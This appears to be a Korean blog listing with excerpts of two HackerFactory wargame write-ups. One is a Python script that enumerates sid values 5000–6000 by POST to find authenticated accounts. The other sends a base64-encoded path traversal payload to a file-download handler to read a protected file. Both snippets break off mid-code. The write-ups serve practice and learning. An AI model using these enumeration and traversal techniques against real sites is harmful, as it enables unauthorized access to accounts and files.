Write Up/해커팩토리

서론 NULL 진행과정 MyPage 페이지의 소스를 보면 5000~6000범위가 인증된 사용자라고 한다. 1. sid인자를 POST방식으로 주면서 테스트해보면 되는데 계정이 없는 경우 글자수가 58글자임을 확인. 2. 글자수가 58글자가 아닌 sid값들을 모조리 검증해보면 답을 얻을 수 있다.1234567891011121314#coding:utf-8import httplib conn = httplib.HTTPConnection("www.hackerfactory.co.kr")url = "/wargame/war10/MyPage.php"answer_list = list() for i in range(5000, 6001) : conn.request("POST", url, "sid="+str(i), {"Cooki..

서론 NULL 진행과정 utill.js를 잘 살펴보고 루틴을 파이썬으로 코딩하여 처리하면 된다.1234567891011#coding:utf-8import httplib, base64 conn = httplib.HTTPConnection("www.hackerfactory.co.kr") url = "/wargame/war5/HackDownAct.php" param = base64.b64encode('....//....//....//....//....//....//....//temp/hacktory.txt,Y')conn.request("POST", url, "FileName="+param, {"Cookie":"", "Content-Type":"application/x-www-form-urlencoded"}) ..